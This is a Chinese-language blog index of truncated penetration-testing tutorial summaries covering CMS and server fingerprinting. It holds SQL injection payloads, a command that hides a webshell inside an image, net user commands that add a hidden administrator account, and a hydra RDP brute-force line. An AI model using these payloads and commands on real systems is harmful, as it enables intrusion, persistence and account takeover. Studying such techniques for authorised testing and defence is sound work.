摘要:
【网站信息暴露CMS】看网站底部但不仅限于,如果未修改的话,一般都会有CMS的信息以及版本。 【robots暴露CMS】robots.txt 确实很多robots都会有CMS的版权,一般在头部居多。 【搜索引擎探测CMS】这个方法我常用,就是在google里site:目标站 CMS 或者内容管理系统 阅读全文
摘要:
目标站的脚本语言识别】 1-1 最简单的方法,在域名后面分别加个/index.asp /index.aspx /index.php /index.jsp 不报错则是网站支持的脚本语言 【原理】 大部分网站根目录都会放个index首页文件。这是最快速最简单的方式。 1-2 F12审查元素,在返回头一般 阅读全文
摘要:
【在线工具探测法】爱站 站长 之类的在线工具查询服务器信息 【发包探测】如用burp 截包,发送到改包模式,发包——就可以看到响应头返回的信息了,很多都包含了搭建平台。 【旁站探测法】其实有时候目标站查不出来,我们可以查旁站,一般和目标站搭建平台一样的。但是这里要确保IP是真实的。 【根据常用搭建组 阅读全文
摘要:
【目标站的脚本语言识别】 1-1 最简单的方法,在域名后面分别加个/index.asp /index.aspx /index.php /index.jsp 不报错则是网站支持的脚本语言 【原理】 大部分网站根目录都会放个index首页文件。这是最快速最简单的方式。 1-2 F12审查元素,在返回头一 阅读全文
摘要:
and exists (select * from sysobjects) //判断是否是MSSQL and exists(select * from tableName) //判断某表是否存在..tableName为表名 and 1=(select @@VERSION) //MSSQL版本 And 阅读全文
摘要:
version()获取数据库版本database()获取数据库名user()获取当前用户@@version_compile_os 获取操作系统group_concat(欲查询的参数)获取表名:注入点 UNION SELECT 1,table_name from information_schema. 阅读全文
摘要:
and 1=1 返回正常 也可以用 xor 5>6and 1=2 返回错误 也可以用 xor 5>4 【判断字段数】order by 1 返回正常、order by 1000 返回错误 然后逐步减少,直到最后一个返回正常的数字就是字段数 【猜解表名】 id=4 union select 1,2,3, 阅读全文
摘要:
cmd下执行↓ copy tu.jpg /b + hack.asp /a ok.jpg [说明]tu.jpg //为正常的图片 这里可以是任何图片格式hack.asp //这里一般放上一句话 可以是任何后缀,里面内容就是想插进图片的内容ok.jpg //这里是设置生成的图马文件名 [注意事项]需要将 阅读全文
摘要:
net user查看当前所有系统用户 net user jdq 123456 /add添加用户名为jdq 密码为123456的用户 net localgroup administrators jdq /add把jdq用户提升至管理组 【拓展】1.net不能用时 可以用net1 如net1 user 阅读全文
摘要:
hydra -h //查看基本用法 hydra ip rdp -L users.txt -P pass.txt -V rdp 是协议 -L 指定一个帐号字典 -P 指定一个密码字典 -V 现实爆破测试的详细过程 阅读全文